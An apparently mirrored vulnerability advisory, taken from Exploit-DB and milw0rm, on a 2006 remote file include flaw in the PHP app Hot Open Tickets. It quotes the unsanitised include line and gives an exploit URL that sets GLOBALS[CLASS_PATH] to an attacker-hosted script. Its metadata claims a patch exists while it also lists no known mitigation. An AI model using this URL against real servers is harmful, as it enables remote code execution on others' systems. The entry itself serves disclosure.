Hot Open Tickets (hot_11012004_ver2f) - Remote File Include Vulnerabilities

vendor:

Hot Open Tickets

by:

Kacper (Rahim)

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Hot Open Tickets

Affected Version From: Hot Open Tickets (hot_11012004_ver2f)

Affected Version To: Hot Open Tickets (hot_11012004_ver2f)

Patch Exists: YES

Related CWE: CVE-2006-2790

CPE: a:hotopentickets:hot_open_tickets

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

Hot Open Tickets (hot_11012004_ver2f) – Remote File Include Vulnerabilities

This vulnerability allows remote attackers to execute arbitrary PHP code on the vulnerable server. The vulnerability is caused due to the "lib_action_step.php" script not properly sanitizing user input supplied to the "GLOBALS[CLASS_PATH]" variable. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

Mitigation:

No known mitigation

Source

Exploit-DB raw data:

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
#   HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities
#   Find by Kacper (Rahim).
#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#   Site scripts: http://hotopentickets.sourceforge.net
#
####################################################################
*/ lib_action_step.php: Line(1-4)

   include ($GLOBALS["CLASS_PATH"]."/User_list_class.php");
   function print_action_list($a)
   {

/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Expl:

http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-27]